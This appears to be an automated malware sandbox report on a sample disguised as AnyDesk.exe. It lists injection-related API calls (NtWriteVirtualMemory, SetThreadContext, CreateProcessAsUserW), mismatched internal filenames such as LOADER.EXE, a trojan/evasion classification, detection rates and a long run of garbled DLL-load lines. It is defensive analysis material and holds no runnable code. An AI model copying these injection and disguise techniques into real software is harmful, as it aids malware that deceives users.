Source: C:\Users\user\Desktop\AnyDesk.exe	Code function: 0_2_02B3DD70 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,	0_2_02B3DD70
Source: C:\Users\user\Desktop\AnyDesk.exe	Code function: 0_2_02B37D78 NtWriteVirtualMemory,	0_2_02B37D78
Source: C:\Users\user\Desktop\AnyDesk.exe	Code function: 0_2_02B3DBB0 RtlI,RtlDosPathNameToNtPathName_U,NtDeleteFile,	0_2_02B3DBB0
Source: C:\Users\user\Desktop\AnyDesk.exe	Code function: 0_2_02B3DC8C RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,	0_2_02B3DC8C
Source: C:\Users\user\Desktop\AnyDesk.exe	Code function: 0_2_02B3DC04 RtlI,RtlDosPathNameToNtPathName_U,NtDeleteFile,	0_2_02B3DC04
Source: C:\Users\user\Desktop\AnyDesk.exe	Code function: 0_2_02B38D70 GetThreadContext,SetThreadContext,NtResumeThread,	0_2_02B38D70
Source: C:\Users\user\Desktop\AnyDesk.exe	Code function: 0_2_02B38D6E GetThreadContext,SetThreadContext,NtResumeThread,	0_2_02B38D6E

Source: C:\Users\user\Desktop\AnyDesk.exe

Code function: 0_2_02B3F7C8 InetIsOffline,CoInitialize,CoUninitialize,CreateProcessAsUserW,ResumeThread,CloseHandle,CloseHandle,ExitProcess,

0_2_02B3F7C8

Source: C:\Users\user\Desktop\AnyDesk.exe	Code function: 0_2_02B220C4		0_2_02B220C4
Source: C:\Users\user\Desktop\AnyDesk.exe	Code function: 0_2_02B4E596		0_2_02B4E596

Source: C:\Users\user\Desktop\AnyDesk.exe	Code function: String function: 02B244DC appears 74 times
Source: C:\Users\user\Desktop\AnyDesk.exe	Code function: String function: 02B3894C appears 56 times
Source: C:\Users\user\Desktop\AnyDesk.exe	Code function: String function: 02B24860 appears 949 times
Source: C:\Users\user\Desktop\AnyDesk.exe	Code function: String function: 02B24500 appears 33 times
Source: C:\Users\user\Desktop\AnyDesk.exe	Code function: String function: 02B246D4 appears 244 times
Source: C:\Users\user\Desktop\AnyDesk.exe	Code function: String function: 02B389D0 appears 45 times

Source: AnyDesk.exe	Binary or memory string: OriginalFilename vs AnyDesk.exe
Source: AnyDesk.exe, 00000000.00000002.3368560990.0000000002B4E000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameeasinvoker.exej% vs AnyDesk.exe
Source: AnyDesk.exe, 00000000.00000002.3368560990.0000000002B4E000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLOADER.EXEB vs AnyDesk.exe
Source: AnyDesk.exe, 00000000.00000002.3383259657.000000007F9FF000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLOADER.EXEB vs AnyDesk.exe
Source: AnyDesk.exe, 00000000.00000003.2120469469.000000000286E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameeasinvoker.exej% vs AnyDesk.exe
Source: AnyDesk.exe, 00000000.00000002.3368038850.0000000002AA8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameeasinvoker.exej% vs AnyDesk.exe
Source: AnyDesk.exe, 00000000.00000003.2120740305.000000007F880000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameeasinvoker.exej% vs AnyDesk.exe
Source: AnyDesk.exe, 00000000.00000003.2120740305.000000007F880000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLOADER.EXEB vs AnyDesk.exe
Source: AnyDesk.exe, 00000000.00000003.2119845710.000000007FA90000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameeasinvoker.exej% vs AnyDesk.exe
Source: AnyDesk.exe, 00000000.00000002.3368038850.0000000002AAC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLOADER.EXEB vs AnyDesk.exe
Source: AnyDesk.exe, 00000000.00000003.2120469469.0000000002872000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLOADER.EXEB vs AnyDesk.exe

Source: AnyDesk.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Source: classification engine

Classification label: mal76.troj.evad.winEXE@1/0@2/1

Source: C:\Users\user\Desktop\AnyDesk.exe

Code function: 0_2_02B27FD2 GetDiskFreeSpaceA,

0_2_02B27FD2

Source: C:\Users\user\Desktop\AnyDesk.exe

Code function: 0_2_02B36DC8 CoCreateInstance,

0_2_02B36DC8

Source: C:\Users\user\Desktop\AnyDesk.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales			Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales			Jump to behavior

Source: C:\Users\user\Desktop\AnyDesk.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: AnyDesk.exe	ReversingLabs: Detection: 65%
Source: AnyDesk.exe	Virustotal: Detection: 31%

Source: C:\Users\user\Desktop\AnyDesk.exe

File read: C:\Users\user\Desktop\AnyDesk.exe

Jump to behavior

Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: url.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ?p .dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ???p.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
